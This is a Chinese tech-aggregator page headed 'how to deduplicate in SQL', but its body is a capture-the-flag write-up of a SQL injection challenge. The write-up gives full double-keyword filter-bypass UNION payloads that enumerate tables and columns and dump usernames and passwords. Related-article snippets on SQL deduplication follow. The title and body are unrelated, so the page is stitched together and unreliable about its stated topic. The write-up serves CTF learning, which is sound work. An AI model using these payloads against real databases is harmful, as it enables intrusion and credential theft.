2. 程式人生 > 資料庫 >sql 如何去重?

sql 如何去重?

阿新 發佈:2021-01-11

剛看到題目,上面寫著過濾了很多,所以要注意

  1. 試探性地先在兩個引數後面加單引號來測試注入點,發現兩個都可以,我選擇了後者

  2. 在使用#和--+時發現#被過濾,因為用#時它沒有報錯,但是--+報錯了,所以只能用--+

  3. 在‘後加order by 1語句時發現返回der 1 ,證明or 和 by 都被過濾掉了,試試雙寫繞過,成功,所以可以繞過,數字增加,到了4不行,說明有三個回顯位

  4. 於是正常聯合查詢,但顯示

    use near '.tables  table_schema='geek'-- '' at line 1

    發現union select也被過濾,試了試from、where也是被過濾了

    所以都雙寫繞過

    注意因為or被過濾information中的or也雙寫繞過

查詢表playload:' ununionion selselectect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema='geek'--+

同樣方法查詢列,發現and也被過濾,雙寫繞過

查詢列playload:' ununionion selselectect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_schema='geek' anandd table_name='b4bsql'--+

同樣方法查出flag

playload:' ununionion selselectect 1,2,concat(id,'-',username,'-',passwoorrd) frfromom geek.b4bsql limit 7,1--+

總結:此題不難,正常注入語法就行,只是要通過回顯的錯誤來判斷過濾掉的關鍵詞

相關推薦

SQL------方案------千百萬級資料量

以下方案暫定,後面會試一下效果。 主要的思路是分段,因為直接一個語句太慢了。

SQL DISTINCT 語法

SQL SELECT DISTINCT語句 在表中可能會包含重複值。這並不成問題, 不過有時你也許希望僅僅列出不同(distinct)的值。

SQL語句【distinct】和【group by】究竟用哪個?

技術標籤:能工巧匠mysqlsql資料庫 我是幫助主人快速定位的目錄錄~ 問題丟擲distinct和group by的用法distinctgroup by

SQL

技術標籤:學習 問題:DISTINCT用於返回唯一不同的值,多個數據 方法:SELECT DISTINCT 列名稱 FROM 表名稱

一條sql語句完成MySQL留一

前幾天在做一個需求的時候,需要清理mysql中重複的記錄,當時的想法是通過程式碼遍歷寫出來,然後覺得太複雜,心裡想著應該可以通過一個sql語句來解決問題的。查了資料,請教了大佬之後得出了一個很便利的sql語句,這

sql 逗號分隔的字串函式

sqlserver 函式: Create function [dbo].[GetDistinct](@str varchar(1000)) returns varchar(1000) as BEGIN

sql left join _混入了一些奇怪的東西?SQL小技巧之資料

技術標籤:sql left join sql sum sql 並統計總數sql 查詢sql 求和sql 結果

Mysql資料庫中查詢重複資料和資料 , 刪除重複資料的sql及分析

html { overflow-x: initial !important } :root { --bg-color: #ffffff; --text-color: #333333; --select-text-bg-color: #B5D6FC; --select-text-font-color: auto; --monospace: \"Lucida Console\",Consolas,\"

sql 如何

總的思路就是先找出表中重複資料中的一條資料,插入臨時表中,刪除所有的 複數據,然後再將臨時表中的資料插入表中。 實現: 重複資料完全一樣,使用 distinct; id 列不同,id 型別為 int,自增欄位,使用聚合

sql根據多個欄位查詢 返回所有欄位

技術標籤:SQLsql資料庫 book表中的資料:根據所有欄位: SELECT DISTINCT * from dbo.book

PetaPoco中使用分頁方法時遇到用DISTINCT時,要注意排序欄位的SQL表別名寫法。

//排序-根據實際情況修改,注意這裡不要指定a.的別名,不然會造成PageList方法的錯誤找不到排序列

一條sql語句完成MySQL留保留一條記錄

Mysql重複資料sql保留一條資料 DELETE consum_record FROM consum_record, ( SELECT min(id) id,

SQL基礎】基礎查詢:所有列、指定列、、限制行數、改名

〇、建表資料 drop table if exists user_profile; CREATE TABLE `user_profile` ( `id` int NOT NULL, `device_id` int NOT NULL,

將MySQL操作優化到極致的操作方法

•問題提出 源表t_source結構如下: item_id int,created_time datetime,modified_time datetime,item_name varchar(20),other varchar(20)

python redis連線 有序集合的程式碼

python redis連線 有序集合的程式碼如下所述: # -*- coding: utf-8 -*- import redis from constant import redis_ip,redis_db,redis_pw,redis_zset_name

Redis精確計數方法(咆哮點陣圖)

前言 如果要統計一篇文章的閱讀量,可以直接使用 Redis 的 incr 指令來完成。如果要求閱讀量必須按使用者去重,那就可以使用 set 來記錄閱讀了這篇文章的所有使用者 id,獲取 set 集合的長度就是去重閱讀量。但是如果

mysql自聯的一些筆記記錄

我先把功能場景簡要闡述下: 資料行欄位如下: name started_at type 在這張表裡,name有重複值

MySQL資料表合併的簡單實現方法

場景: 爬取的資料生成資料表,結構與另一個主表相同,需要進行合併+ 解決:(直接舉例)

JS陣列屬性並校驗重複資料

這篇文章主要介紹了JS陣列屬性並校驗重複資料,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

簡述Java List五種方法

前言 ,對於很多場合必不可少。寫此篇文章是因為在之前做某個畫面中,我在資料庫中進行 Distinct 和 Order By ,發現影響效率,故此在後臺先做處理;所以記錄此文,已做參考: